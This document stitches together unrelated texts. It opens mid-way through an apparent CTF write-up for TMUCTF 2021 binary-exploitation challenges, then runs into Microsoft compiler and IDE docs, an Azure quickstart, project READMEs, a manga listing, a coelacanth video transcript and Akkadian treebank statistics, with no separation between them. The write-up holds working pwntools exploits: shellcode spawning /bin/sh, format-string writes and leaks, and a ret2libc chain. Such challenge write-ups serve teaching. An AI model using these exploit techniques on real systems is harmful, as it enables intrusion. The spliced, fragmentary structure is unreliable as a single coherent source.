p = process("./areyouadmin")
else:
p = remote("194.5.207.113",7020)
p.recv()
p.sendline(payload)
p.recv()
p.sendline(payload2)
print(p.recvall())
```
<br>
<img src="/assets/img/tmu/areyouadmin_sol.png">
Flag is <span style="color:red">`TMUCTF{7h3_6375_func710n_15_d4n63r0u5_4nd_5h0uld_n07_b3_u53d}`</span>
# canary
<img src="/assets/img/tmu/canary.png">
This challenge was interesting: it accepts two strings and tells us if they are equal or not. Additionally, it asks for a phone number at the end, and using this field we can overwrite the return address. By using checksec we can see it has an executable stack.
The challenge also provides us with the address of the canary:
**Leaked Canary Address + 12 = Address of String1**
The challenge doesn't have an actual stack canary but a dummy value placed between our string1 and string2.
The reason it says you cannot inject shellcode is that both strings only accept input up to 15 characters.
In short it's a <span style="color:red">shellcoding challenge</span> with a small buffer.
The exploit is simple: we have to use a stage 1 shellcode which will read our stage 2 (main) shellcode.
```python
from pwn import *
context.arch = 'amd64'
flag = False
if flag:
p = process("./canary")
else:
p = remote("194.5.207.113",7030)
def stage1():
stage1_shellcode = asm('''
xor eax,eax
xor edi,edi
mov rsi,rsp
mov dl,100
syscall
jmp rsp
''')
p.recv()
p.sendline(stage1_shellcode)
p.recv()
p.sendline(b"Mikey-kun")
p.recvuntil(b"address: ")
ret = int(p.recv(14),16)+12
log.info("Return Address : " + hex(ret))
p.recv()
p.sendline(b"BAJI"*5 + p64(ret))
def stage2():
stage2_shellcode = asm('''
mov rbx,0x0068732f6e69622f
push rbx
mov rdi,rsp
xor esi,esi
xor edx,edx
xor eax,eax
mov al,59
syscall
''')
p.send(stage2_shellcode)
p.interactive()
stage1()
stage2()
```
<br>
<img src="/assets/img/tmu/canary_sol.png">
Flag is <span style="color:red">`TMUCTF{3x3cu74bl3_574ck_15_v3ry_d4n63r0u5}`</span>
# security code
<img src="/assets/img/tmu/security_code.png">
Can you print the flag??????????? 🤣 The reason it says this is that even after you exploit the vulnerability you will find yourself wondering 🤔 why it isn't printing the flag. Let's take a look.
When you execute the binary it asks whether we want to be an admin or a user. If we say admin, it asks for our name and says `hello our dear admin, name_we_entered`
As soon as our name gets reflected I go for format specifiers like %p %x, and indeed it was a <span style="color:red">`format string vulnerability`</span> because it started printing values on the stack.
Please note this is a 32-bit executable, so it's not that hard.
<img src="/assets/img/tmu/seccode.png">
As you can see we have to modify that <span style="color:red">`security_code`</span> variable to <span style="color:red">`0xabadcafe`</span> which was set to 0 by default.
So how do we do that? Well, the <span style="color:red">`%n modifier`</span> writes the number of characters printed so far into the address supplied as the corresponding argument.
Just refer this pdf and you will get it <a href="https://web.ecs.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf">Format String (Click Here)</a>
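Python has no `%n`, but the mechanic it relies on is simple to sketch: every conversion grows the count of characters printed so far, and `%n` stores that running count:

```python
# Each %08x conversion prints exactly 8 characters, so after two of
# them a %n at this point would write 16 to the target address.
fmt_output = "%08x%08x" % (0xdeadbeef, 0xcafebabe)
chars_printed = len(fmt_output)  # the value %n would write here
print(chars_printed)  # -> 16
```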
```python
from pwn import *
isremote = True  # assumption: set to False to run against a local ./securitycode binary
seccode = 0x0804c03c
def pad(s):
return s+b"x"*(1023-len(s))
payload = b""
payload += p32(seccode)
payload += p32(seccode+1)
payload += p32(seccode+2)
payload += p32(seccode+3)
payload += b"%238x%15$hhn"
payload += b"%204x%16$hhn"
payload += b"%227x%17$hhn"
payload += b"%254x%18$hhn"
exp = pad(payload)
```
This will set the <span style="color:red">`security_code`</span> to <span style="color:red">`0xabadcafe`</span> and will call the function <span style="color:red">`auth_admin`</span>
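In case the pad widths 238/204/227/254 look like magic: they can be derived mechanically. Sixteen characters (the four packed addresses) are printed before the first `%hhn` fires, each `%<pad>x` adds `<pad>` more characters, and `%hhn` stores the low byte of the running total:

```python
# Derive the %hhn pad widths that write 0xabadcafe one byte at a time.
target = 0xabadcafe
written = 16                                # the four 4-byte addresses
pads = []
for byte in target.to_bytes(4, "little"):   # write fe, ca, ad, ab in order
    pad = (byte - written) % 256
    pads.append(pad)
    written += pad
print(pads)  # -> [238, 204, 227, 254]
```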
Now the <span style="color:red">`auth_admin`</span> function will open the flag file, ask for a password, and simply print out the password, nothing else. BUTTTTTTT!! the password is also reflected, which means, YEP you guessed it, it's format string vulnerable too.
We know our flag is also going to be on the stack, so we can leak it out.
BUTTT here's a twist: the password field accepts only 5 characters, so how can we leak the flag if we can only fit the first two values, right? <span style="color:red">`%p %p`</span>. That's where <span style="color:red">`$`</span> comes in handy.
The <span style="color:red">`$`</span> allows us to access any value on the stack. For example, if we want to access the 4th value on the stack we can do something like this: <span style="color:red">`%4$x`</span>
Our flag starts at the 7th offset, so that's it: we execute our exploit multiple times, incrementing the offset value, and we get the entire flag <font color="red">easy_peasy</font>
```python
def leak_flag(n):
flag = b""
while b"}" not in flag:
if isremote:
p = remote("185.235.41.205",7040)
else:
p = process("./securitycode")
p.recv()
p.sendline("A")
p.recv()
p.send(exp)
modifier = "%"+str(n)+"$p"
p.sendline(modifier)
p.recvuntil(b"password is ")
flag += p64(int(p.recv(10),16))
n+=1
return flag.replace(b'\x00',b'')
flag = leak_flag(7)
print(flag)
```
<br><img src="/assets/img/tmu/security_code_sol.png">
Flag is <span style="color:red">`TMUCTF{50_y0u_kn0w_50m37h1n6_4b0u7_f0rm47_57r1n6_0xf7e11340}`</span>
# fakesurvey
<img src="/assets/img/tmu/fakesurvey.png">
This challenge showcases two vulnerabilities: one is a format string and the other is a buffer overflow. By analyzing the binary we find out that it's a 32-bit executable.
When we execute the binary it first asks for the password. The password is stored in a file named <span style="color:red">`passPhrase`</span>, so it opens the file and checks if the password we entered is equal to the password in the passPhrase file. The password field accepts an input of 15 characters and is vulnerable to a format string attack.
Remember what I said previously, that it opens the file for password comparison? So just like the previous challenge we can leak out the password using the format string. The password starts at the 8th value on the stack.
```python
def leak_passphrase():
p = remote("185.235.41.205",7050)
p.recv()
p.sendline(b"%8$llx %9$llx")
p.recvuntil(b"Your password is ")
l = p.recv()[:-1].split(b" ")
p.close()
password = b""
for i in l:
password += p64(int(i,16))
return password
```
When you enter the correct password it then asks for your name and exits, that's it. But the name field has a buffer overflow. So where do we return? I mean, there isn't a specific function which will print out the flag.
So I guess we have to do a <span style="color:red">`ret2libc`</span> attack. We basically have to call <span style="color:red">`system("/bin/sh")`</span>, and how are we going to do that? We don't know the address of system, and the system has <span style="color:red">`ASLR`</span> enabled.
Here's the exploit: we are first going to use <span style="color:red">`ret2puts`</span>. This sounds funny, but we are going to use <span style="color:red">`puts`</span> to leak out the address of <span style="color:red">`puts`</span>, and once we have the address of puts we can then calculate other offsets such as system and binsh.
There's this thing called the <span style="color:red">`libc database`</span> which can help you find the libc version if you provide it with at least a single address of any function; in our case that's going to be puts.
```diff
- Why we need a libc database?
Because we don't know which version of libc the remote server is using
```
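Once the database has identified the libc build, the rest is plain offset arithmetic. A sketch with placeholder numbers (every constant below is made up for illustration; the real offsets come from the matched libc, not from this post):

```python
# Placeholder values -- NOT the challenge's real addresses/offsets.
leaked_puts   = 0xf7e11340  # hypothetical address printed by ret2puts
puts_offset   = 0x00067360  # hypothetical offset of puts in the matched libc
system_offset = 0x0003cd10  # hypothetical offset of system

libc_base   = leaked_puts - puts_offset
system_addr = libc_base + system_offset
print(hex(libc_base), hex(system_addr))
```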
Then, as the return address for the ret2puts, we use the address of <span style="color:red">`main()`</span>
```python
def leak_libc_base():
payload = b"A"*76
payload += p32(binary.plt['puts'])
payload += p32(binary.symbols['main'])
payload += p32(binary.got['puts'])
p.recv()
p.recv()
p.sendline(passphrase)
p.recv()
p.recv()
p.sendline(payload)
p.recvuntil(b"***\n")
leak = u32(p.recv(4))
log.info("puts libc leaked address : " + hex(leak))
libc_base = leak - libc.symbols['puts']
log.info("libc base address : " + hex(libc_base))
return libc_base
```
Now we can calculate the addresses of <span style="color:red">`system`</span> and <span style="color:red">`binsh`</span>, and this time we are going to call <span style="color:red">`system("/bin/sh")`</span>
```
Exploit = [padding][puts.plt][main][puts.got]
Exploit2 = [padding][system][put_anything_here_as_ret_address][binsh]
```
```python
def get_shell(libc_base):
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b"/bin/sh"))
payload = b"A"*76
payload += p32(system)
payload += b"CCCC"
payload += p32(binsh)
p.recv()
p.sendline(passphrase)
p.recv()
p.recv()
p.send(payload)
p.interactive()
```
<img src="/assets/img/tmu/fakesurvey_sol.png">
Flag is <span style="color:red">`TMUCTF{m4yb3_y0u_u53d_7h3_574ck_4nd_r37urn3d_70_dl_r350lv3}`</span>
>You can download the challenge and exploit files <a href="https://github.com/kirimoe/tmuctf2021">from here</a>
---
title: "Compiler Warning (level 1) C4532 | Microsoft Docs"
ms.custom: ""
ms.date: "11/04/2016"
ms.reviewer: ""
ms.suite: ""
ms.technology: ["cpp-tools"]
ms.tgt_pltfrm: ""
ms.topic: "error-reference"
f1_keywords: ["C4532"]
dev_langs: ["C++"]
helpviewer_keywords: ["C4532"]
ms.assetid: 4e2a286a-d233-4106-9f65-29be1a94ca02
caps.latest.revision: 9
author: "corob-msft"
ms.author: "corob"
manager: "ghogen"
---
# Compiler Warning (level 1) C4532
'continue' : jump out of __finally/finally block has undefined behavior during termination handling
The compiler encountered one of the following keywords:
- [continue](../../cpp/continue-statement-cpp.md)
- [break](../../cpp/break-statement-cpp.md)
- [goto](../../cpp/goto-statement-cpp.md)
causing a jump out of a [__finally](../../cpp/try-finally-statement.md) or [finally](../../dotnet/finally.md) block during abnormal termination.
If an exception occurs, and while the stack is being unwound during execution of the termination handlers (the `__finally` or finally blocks), and your code jumps out of a `__finally` block before the `__finally` block ends, the behavior is undefined. Control may not return to the unwinding code, so the exception may not be handled properly.
If you must jump out of a **__finally** block, check for abnormal termination first.
The following sample generates C4532; simply comment out the jump statements to resolve the warnings.
```
// C4532.cpp
// compile with: /W1
// C4532 expected
int main() {
int i;
for (i = 0; i < 10; i++) {
__try {
} __finally {
// Delete the following line to resolve.
continue;
}
__try {
} __finally {
// Delete the following line to resolve.
break;
}
}
}
```
# C1 Assessment
This is my repository for the **C1 Assessment** development project.

## Prerequisites to run the project:
- You must have Docker and Docker Compose (recent versions) installed;
- Preferably on a Linux operating system.

**Attention**: if you are not using Linux, you will have to comment out the **Portainer** section in the `docker-compose.yml` file, since it is configured to run on Linux. See the instructions below.

## How to run the project:
- Download the `c1` directory and all of its contents (or clone this entire repository);
- Inside the `c1/backend` directory there is a Docker Compose file, `docker-compose.yml`. Take a look at that file and:
    - Check that the ports used will not conflict with any port already in use on your computer. The configured ports are:
        - 27017 (for MongoDB)
        - 8081 (for Mongo-Express)
        - 8080 (for Adminer)
        - 3005 (for Node)
        - 9000 and 8000 (for Portainer)
    - If you are using Linux, you don't need to do anything else.
    - If you are using Windows, you will need to configure Portainer, since it is set up for Linux. As Portainer is not required for this project, you can simply comment out that whole service.
- After you have checked the ports and Portainer, open a shell, go to the `c1/backend` directory and run: **`docker-compose up -d`**
    - This command downloads the required images, builds the containers (with the appropriate networks and volumes) and, if all goes well, you can then access the application.
    - On subsequent runs, just use `docker-compose start` and `docker-compose stop`.
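For reference, the port mappings listed earlier correspond to `docker-compose.yml` entries like the sketch below. Service names and image tags here are assumptions for illustration; check the actual file in `c1/backend`:

```yaml
services:
  mongo:
    image: mongo
    ports:
      - "27017:27017"
  mongo-express:
    image: mongo-express
    ports:
      - "8081:8081"
  node:
    build: .
    ports:
      - "3005:3005"
```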
## How to access the application:
Since this application is only the backend API, all interactions (GET, POST, PUT, DELETE) must be performed with JSON payloads, using Postman or Insomnia.

For GET requests, a browser is enough:

* http://localhost:3005 (application root)
* http://localhost:3005/api/unidades (health units API)
* http://localhost:3005/api/pessoas (API for the people who use the health units)
* http://localhost:3005/api/agendamentos (appointments API)

If you wish, you can access Mongo-Express to check what is being stored in MongoDB: http://localhost:8081

## Database:
The assessment requirements specified MongoDB. However, MongoDB is a NoSQL database and, for the requested application, a SQL database would actually have been a better fit.
# Certificado-Digital-Innovation-One
All the certificates
---
title: Options, text editor, C / C++, formatting | Microsoft Docs
ms.custom: ''
ms.date: 11/15/2016
ms.prod: visual-studio-dev14
ms.reviewer: ''
ms.suite: ''
ms.technology:
- vs-ide-general
ms.tgt_pltfrm: ''
ms.topic: article
f1_keywords:
- VS.ToolsOptionsPages.Text_Editor.C/C++.Formatting.General
- VS.ToolsOptionsPages.Text_Editor.C%2fC%2b%2b.Formatting.General
dev_langs:
- C++
helpviewer_keywords:
- Text Editor Options dialog box, formatting
ms.assetid: cb6f1cbb-5305-48da-a8e8-33fd70775d46
caps.latest.revision: 20
author: gewarren
ms.author: gewarren
manager: ghogen
ms.openlocfilehash: a8589696e669c83b65951d81d155033d45533710
ms.sourcegitcommit: 9ceaf69568d61023868ced59108ae4dd46f720ab
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 10/12/2018
ms.locfileid: "49237009"
---
# <a name="options-text-editor-cc-formatting"></a>Options, Text Editor, C/C++, Formatting
[!INCLUDE[vs2017banner](../../includes/vs2017banner.md)]
Lets you change the default behavior of the code editor when you are programming in C or C++.
To access this page, in the **Options** dialog box, in the left pane, expand **Text Editor**, expand **C/C++**, and then choose **Formatting**.
> [!NOTE]
> Your computer might show different names or locations for some of the Visual Studio user interface elements in the following instructions. The Visual Studio edition that you have and the settings that you use determine these elements. For more information, see [Personalizing development settings in Visual Studio](http://msdn.microsoft.com/en-us/22c4debb-4e31-47a8-8f19-16f328d7dcd3).
## <a name="cc-options"></a>C/C++ Options
**Enable Automatic Quick Info tooltips**
Enables or disables the Quick Info feature of IntelliSense.
## <a name="inactive-code"></a>Inactive Code
**Show inactive code blocks**
Code that is inactive due to `#ifdef` declarations can be colored differently to help you identify it.
**Disable inactive code opacity**
Inactive code can be identified by using color instead of transparency.
**Inactive code opacity percent**
The degree of opacity of inactive code blocks can be customized.
## <a name="indentation"></a>Indentation
**Indent braces**
You can configure how braces are aligned when you press ENTER after starting a code block, for example a function or a `for` loop. Braces can be aligned with the first character of the code block, or they can be indented.
**Automatically indent on tab**
You can configure what happens to the current line of code when you press the TAB key: either the line is indented, or a tab is inserted.
## <a name="miscellaneous"></a>Miscellaneous
**Enumerate comments in Task List window**
The editor can scan open source files for preset words in comments. It creates an entry in the **Task List** window for each keyword it finds.
**Highlight matching tokens**
When the cursor is next to a brace, the editor can highlight the matching brace, making it easier to see the code between them.
## <a name="outlining"></a>Outlining
**Enter outlining mode when files open**
You can enable the outlining feature when you bring a file into the text editor. For more information, see [Outlining](../../ide/outlining.md). When this option is selected, the outlining feature is activated when you open a file.
**Automatic outlining of #pragma region blocks**
When this option is selected, automatic outlining of [pragma directives](http://msdn.microsoft.com/library/9867b438-ac64-4e10-973f-c3955209873f) is enabled. This lets you expand or collapse #pragma region blocks in outlining mode.
**Automatic outlining of statement blocks**
When this option is selected, automatic outlining is enabled for the following statement constructs.
- [if-else](http://msdn.microsoft.com/library/d9a1d562-8cf5-4bd4-9ba7-8ad970cd25b2)
- [switch Statement (C++)](http://msdn.microsoft.com/library/6c3f3ed3-5593-463c-8f4b-b33742b455c6)
- [while Statement (C++)](http://msdn.microsoft.com/library/358dbe76-5e5e-4af5-b575-c2293c636899)
## <a name="see-also"></a>See Also
[General, Environment, Options Dialog Box](../../ide/reference/general-environment-options-dialog-box.md)
[Using IntelliSense](../../ide/using-intellisense.md)
# Zankoku na Sankoku

- **type**: manga
- **volumes**: 1
- **original-name**: 残酷な再会
- **start-date**: 2008-01-20
## Tags
- romance
- josei
## Authors
- Kobayashi
- Hiromi (Art)
- Williams
- Cathy (Story)
## Sinopse
Laura and Gabriel were passionately in love - even though she was the daughter of a wealthy family, while he was a mere stable boy. But when Laura's parents reject the penniless Gabriel's proposal to marry their daughter, he disappears in despair. 7 years later, Laura is burdened by huge debts left by her late parents when Gabriel, now a successful and wealthy investor, appears before her. He is not the man she used to know, as he coldly declares: "I bet you never thought this day would come. When our positions are reversed!"
(Source: eManga)
## Links
- [My Anime list](https://myanimelist.net/manga/41391/Zankoku_na_Sankoku)
| 30.806452 | 531 | 0.719372 | eng_Latn | 0.993168 |
61c1c50330550f8bbf4ec3114c160137ae2597e6 | 4,534 | md | Markdown | articles/cognitive-services/cognitive-services-apis-create-account.md | allanfann/azure-docs.zh-tw | c66e7b6d1ba48add6023a4c08cc54085e3286aa3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/cognitive-services/cognitive-services-apis-create-account.md | allanfann/azure-docs.zh-tw | c66e7b6d1ba48add6023a4c08cc54085e3286aa3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/cognitive-services/cognitive-services-apis-create-account.md | allanfann/azure-docs.zh-tw | c66e7b6d1ba48add6023a4c08cc54085e3286aa3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 在 Azure 入口網站中建立認知服務帳戶
titlesuffix: Azure Cognitive Services
description: 如何在 Azure 入口網站中建立的 Azure 認知服務 Api 帳戶。
services: cognitive-services
author: garyericson
manager: nitinme
ms.service: cognitive-services
ms.topic: conceptual
ms.date: 03/26/2019
ms.author: garye
ms.openlocfilehash: 6950cba5ac958233e7ea77c8dc783ca86cc5a386
ms.sourcegitcommit: 6da4959d3a1ffcd8a781b709578668471ec6bf1b
ms.translationtype: MT
ms.contentlocale: zh-TW
ms.lasthandoff: 03/27/2019
ms.locfileid: "58519879"
---
# <a name="quickstart-create-a-cognitive-services-account-in-the-azure-portal"></a>Quickstart: Create a Cognitive Services account in the Azure portal
In this quickstart, you'll learn how to sign up for Azure Cognitive Services and create a single-service or multi-service subscription. These services are represented by Azure [resources](https://docs.microsoft.com/azure/azure-resource-manager/resource-group-portal), which let you connect to one or more of the Azure Cognitive Services APIs.
## <a name="prerequisites"></a>Prerequisites
* A valid Azure subscription. [Create an account](https://azure.microsoft.com/free/) for free.
## <a name="create-and-subscribe-to-an-azure-cognitive-services-resource"></a>Create and subscribe to an Azure Cognitive Services resource
Before you begin, it's important to note that there are two types of Azure Cognitive Services subscriptions. The first is a subscription to a single service, such as Computer Vision or the Speech service. A single-service subscription is restricted to that resource. The second is a multi-service subscription for Azure Cognitive Services. This option lets you use a single subscription for most of the Azure Cognitive Services, and it also consolidates billing. For more information, see [Cognitive Services pricing](https://azure.microsoft.com/pricing/details/cognitive-services/).
>[!WARNING]
> At this time, the following services do **not** support multi-service keys: QnA Maker, the Speech service, Custom Vision, and Anomaly Detector.
The next section walks you through creating a single-service or multi-service subscription.
### <a name="multi-service-subscription"></a>Multi-service subscription
1. Sign in to the [Azure portal](https://portal.azure.com), and click **+ Create a resource**.

2. Locate the search bar and enter: **Cognitive Services**.

3. Select **Cognitive Services**.
![Select Cognitive Services](media/cognitive-services-apis-create-account/azureMarketplaceMulti.png)
4. On the **Create** page, provide the following information:
| | |
|--|--|
| **Name** | A descriptive name for your Cognitive Services resource. We recommend using a descriptive name, for example *MyCognitiveServicesAccount*. |
| **Subscription** | Select one of your available Azure subscriptions. |
| **Location** | The location of your Cognitive Services instance. Different locations may introduce latency, but they do not affect the runtime availability of your resource. |
| **Pricing tier** | The cost of your Cognitive Services account depends on the options you choose and your usage. For more information, see the API [pricing details](https://azure.microsoft.com/pricing/details/cognitive-services/).
| **Resource group** | The [Azure resource group](https://docs.microsoft.com/azure/architecture/cloud-adoption/getting-started/azure-resource-access#what-is-an-azure-resource-group) that will contain your Cognitive Services resource. You can create a new group or add it to a pre-existing group. |

### <a name="single-service-subscription"></a>Single-service subscription
1. Sign in to the [Azure portal](https://portal.azure.com), and click **+ Create a resource**.

2. Under **Azure Marketplace**, select **AI + Machine Learning**. If you don't see the service you're interested in, click **See all** to view the entire catalog of Cognitive Services APIs.

3. On the **Create** page, provide the following information:
| | |
|--|--|
| **Name** | A descriptive name for your Cognitive Services resource. We recommend using a descriptive name, for example *MyNameFaceAPIAccount*. |
| **Subscription** | Select one of your available Azure subscriptions. |
| **Location** | The location of your Cognitive Services instance. Different locations may introduce latency, but they do not affect the runtime availability of your resource. |
| **Pricing tier** | The cost of your Cognitive Services account depends on the options you choose and your usage. For more information, see the API [pricing details](https://azure.microsoft.com/pricing/details/cognitive-services/).
| **Resource group** | The [Azure resource group](https://docs.microsoft.com/azure/architecture/cloud-adoption/getting-started/azure-resource-access#what-is-an-azure-resource-group) that will contain your Cognitive Services resource. You can create a new group or add it to a pre-existing group. |

## <a name="access-your-resource"></a>Access your resource
> [!NOTE]
> Subscription owners can disable the creation of Cognitive Services accounts for a resource group or subscription by applying an [Azure policy](https://docs.microsoft.com/azure/governance/policy/overview#policy-definition), assigning a "Not allowed resource types" policy definition, and specifying **Microsoft.CognitiveServices/accounts** as the target resource type.
After you create the resource, you can access it directly from the Azure dashboard if you pinned it. Otherwise, you can find it under **Resource groups**.
Within your Cognitive Services resource, you can use the endpoint URL and keys in the **Overview** section to start making API calls in your applications.

## <a name="next-steps"></a>後續步驟
> [!div class="nextstepaction"]
> [驗證 Azure 認知服務要求](authentication.md)
## <a name="see-also"></a>請參閱
* [快速入門:從影像擷取手寫文字](https://docs.microsoft.com/azure/cognitive-services/computer-vision/quickstarts/csharp-hand-text)
* [教學課程:建立應用程式來偵測並框出影像中的臉部](https://docs.microsoft.com/azure/cognitive-services/Face/Tutorials/FaceAPIinCSharpTutorial)
* [建置自訂搜尋網頁](https://docs.microsoft.com/azure/cognitive-services/bing-custom-search/tutorials/custom-search-web-page)
* [使用 Bot Framework 整合 Language Understanding (LUIS) 和 Bot](https://docs.microsoft.com/azure/cognitive-services/luis/luis-nodejs-tutorial-build-bot-framework-sample)
The dead coming back to life sounds scary.
But for scientists, it can be
a wonderful opportunity.
Of course, we're not talking about zombies.
Rather, this particular opportunity
came in the unlikely form
of large, slow-moving fish
called the coelacanth.
This oddity dates back 360 million years,
and was believed to have died out
during the same mass extinction event
that wiped out the dinosaurs
65 million years ago.
To biologists and paleontologists,
this creature was a very old and fascinating
but entirely extinct fish,
forever fossilized.
That is, until 1938 when Marjorie Courtenay-Latimer,
a curator at a South African museum,
came across a prehistoric looking, gleaming
blue fish hauled up at the nearby docks.
She had a hunch that this strange,
1.5 meter long specimen was important
but couldn't preserve it in time
to be studied and had it taxidermied.
When she finally was able to
reach J.L.B. Smith, a local fish expert,
he was able to confirm, at first site,
that the creature was indeed a coelacanth.
But it was another 14 years before
a live specimen was found in the Comoros Islands,
allowing scientists to
closely study a creature
that had barely evolved
in 300 million years.
A living fossil.
Decades later, a second species
was found near Indonesia.
The survival of creatures
thought extinct for so long
proved to be one of the
biggest discoveries of the century.
But the fact that the coelacanth
came back from the dead
isn't all that makes
this fish so astounding.
Even more intriguing is the fact that
genetically and morphologically,
the coelacanth has more in common
with four-limbed vertebrates
than almost any other fish,
and its smaller genome is ideal for study.
This makes the coelacanth a powerful link
between aquatic and land vertebrates,
a living record of their transition from
water to land millions of years ago.
The secret to this transition is in the fins.
While the majority of ocean fish
fall into the category of ray-finned fishes,
coelacanths are part of a much smaller,
evolutionarily distinct group with thicker fins
known as lobe-finned fish.
Six of the coelacanth's fins contain bones
organized much like our limbs,
with one bone connecting
the fin to the body,
another two connecting the bone
to the tip of the fin,
and several small,
finger-like bones at the tip.
Not only are those fins structured
in pairs to move in a synchronized way,
the coelacanth even shares
the same genetic sequence
that promotes limb development
in land vertebrates.
So although the coelacanth
itself isn't a land-walker,
its fins do resemble those
of its close relatives
who first hauled their bodies onto land
with the help of these
sturdy, flexible appendages,
acting as an evolutionary bridge
to the land lovers that followed.
So that's how this prehistoric fish
helps explain the evolutionary movement
of vertebrates from water to land.
Over millions of years,
that transition
led to the spread of all
four-limbed animals, called tetrapods,
like amphibians, birds, and even
the mammals that are our ancestors.
There's even another powerful clue
in that unlike most fish,
coelacanths don't lay eggs,
instead giving birth to live, young pups,
just like mammals.
And this prehistoric fish will continue to
provide us with fascinating information
about the migration of vertebrates
out of the ocean over 300 million years ago.
A journey that ultimately drove
our own evolution, survival and existence.
Today the coelacanth remains the symbol
of the wondrous mysteries that remain
to be uncovered by science.
With so much left to learn about this fish,
the ocean depths and evolution itself,
who knows what other well-kept secrets
our future discoveries may bring to life!
# recipe-api
Recipe Python API from Udacity course
# Maratona Behind The Code 2020
This repository gathers the code and resources I used to solve the eight business challenges proposed in IBM's 2020 [Maratona Behind The Code](https://maratona.dev/pt).

The solutions I submitted secured 239th place in the marathon's overall ranking in Brazil, among the tens of thousands of participants.

The description and the starter files provided for each challenge are in the corresponding "desafio" subdirectory (which is a git submodule, cloned from the marathon's repositories).
---
layout: base
title: 'Statistics of cop in UD_Akkadian-RIAO'
udver: '2'
---
## Treebank Statistics: UD_Akkadian-RIAO: Relations: `cop`
This relation is universal.
4 nodes (0%) are attached to their parents as `cop`.
4 instances of `cop` (100%) are left-to-right (parent precedes child).
Average distance between parent and child is 14.25.
The following 2 pairs of parts of speech are connected with `cop`: <tt><a href="akk_riao-pos-NOUN.html">NOUN</a></tt>-<tt><a href="akk_riao-pos-PRON.html">PRON</a></tt> (2; 50% instances), <tt><a href="akk_riao-pos-PROPN.html">PROPN</a></tt>-<tt><a href="akk_riao-pos-PRON.html">PRON</a></tt> (2; 50% instances).
~~~ conllu
# visual-style 12 bgColor:blue
# visual-style 12 fgColor:white
# visual-style 1 bgColor:blue
# visual-style 1 fgColor:white
# visual-style 1 12 cop color:blue
1 šarru šarru NOUN N Case=Nom|Gender=Masc|NounBase=Free|Number=Sing 0 root 0:root MAN
2 dannu dannu ADJ AJ Case=Nom|Gender=Masc|Number=Sing 1 amod 1:amod dan-nu
3 šar šarru NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos MAN
4 māt mātu NOUN N Gender=Fem|NounBase=Bound|Number=Sing 3 nmod:poss 3:nmod:poss KUR
5 Aššur Aššur PROPN GN Gender=Masc 4 nmod:poss 4:nmod:poss AŠ
6 šar šarru NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos MAN
7 kibrāt kibru NOUN N Gender=Fem|NounBase=Bound|Number=Plur 6 nmod:poss 6:nmod:poss kib-rat
8 arba’i _ NUM _ Case=Gen|Gender=Masc|NounBase=Free|Number=Sing 7 nummod 7:nummod _
9 Šamšu Šamaš PROPN DN Case=Nom|Gender=Masc 1 appos 1:appos {d}šam-šu
10 kiššat kiššatu NOUN N Gender=Fem|NounBase=Bound|Number=Sing 9 nmod:poss 9:nmod:poss kiš-šat
11 nišī nišu NOUN N Gender=Fem|Number=Plur 10 nmod:poss 10:nmod:poss UN.MEŠ
12 anāku anāku PRON IP Number=Sing|Person=1 1 cop 1:cop a-na-ku
~~~
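The counts above can be reproduced mechanically from the CoNLL-U source. Here is a minimal sketch; the two-line sample below is abbreviated for illustration, not a full sentence from the treebank:

```python
SAMPLE = """\
# sent_id = demo
1\tšarru\tšarru\tNOUN\tN\t_\t0\troot\t0:root\t_
12\tanāku\tanāku\tPRON\tIP\t_\t1\tcop\t1:cop\t_
"""

def count_deprel(conllu, rel):
    """Count tokens whose DEPREL column (the 8th) equals rel."""
    hits = 0
    for line in conllu.splitlines():
        # Skip comment lines and blank sentence separators.
        if not line or line.startswith("#"):
            continue
        cols = line.split("\t")
        if len(cols) >= 8 and cols[7] == rel:
            hits += 1
    return hits

print(count_deprel(SAMPLE, "cop"))  # → 1
```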
~~~ conllu
# visual-style 13 bgColor:blue
# visual-style 13 fgColor:white
# visual-style 1 bgColor:blue
# visual-style 1 fgColor:white
# visual-style 1 13 cop color:blue
1 Adad-nerari Adad-nerari_II PROPN RN Gender=Masc 0 root 0:root {m}{d}IŠKUR-ERIM.TAH₂
2 šarru šarru NOUN N Case=Nom|Gender=Masc|NounBase=Free|Number=Sing 1 appos 1:appos MAN
3 dannu dannu ADJ AJ Case=Nom|Gender=Masc|Number=Sing 2 amod 2:amod dan-nu
4 šar šarru NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos MAN
5 māt mātu NOUN N Gender=Fem|NounBase=Bound|Number=Sing 4 nmod:poss 4:nmod:poss KUR
6 Aššur Aššur PROPN GN Gender=Masc 5 nmod:poss 5:nmod:poss aš-šur
7 šar šarru NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos MAN
8 kibrāt kibru NOUN N Gender=Fem|NounBase=Bound|Number=Plur 7 nmod:poss 7:nmod:poss kib-rat
9 arba’i _ NUM _ Case=Gen|Gender=Masc|NounBase=Free|Number=Sing 8 nummod 8:nummod _
10 munēr _ NOUN _ Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos _
11 ayyābī ayyābu NOUN N Gender=Masc|NounBase=Suffixal|Number=Plur 10 nmod:poss 10:nmod:poss a-ia-bi-šu
12 šu _ PRON _ Gender=Masc|Number=Sing|Person=3 11 det:poss 11:det:poss _
13 anāku anāku PRON IP Number=Sing|Person=1 1 cop 1:cop ana-ku
14 šarru šarru NOUN N Case=Nom|Gender=Masc|NounBase=Free|Number=Sing 1 appos 1:appos MAN
15 lēʾû lēʾû ADJ AJ Case=Nom|Gender=Masc|Number=Sing 14 amod 14:amod le-ʾu-u₂
16 qabli qablu NOUN N Case=Gen|Gender=Masc|NounBase=Free|Number=Sing 15 nmod:poss 15:nmod:poss MURUB₄
17 sāpin sāpinu NOUN N Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos sa-pi-in
18 ālāni ālu NOUN N Gender=Masc|Number=Plur 17 nmod:poss 17:nmod:poss URU.URU
19 mušahmeṭi _ NOUN _ Gender=Masc|NounBase=Bound|Number=Sing 1 appos 1:appos _
20 šadê šadû NOUN N Gender=Masc|Number=Plur 19 nmod:poss 19:nmod:poss KUR.MEŠ
21 ša ša ADP DET _ 22 case 22:case ša
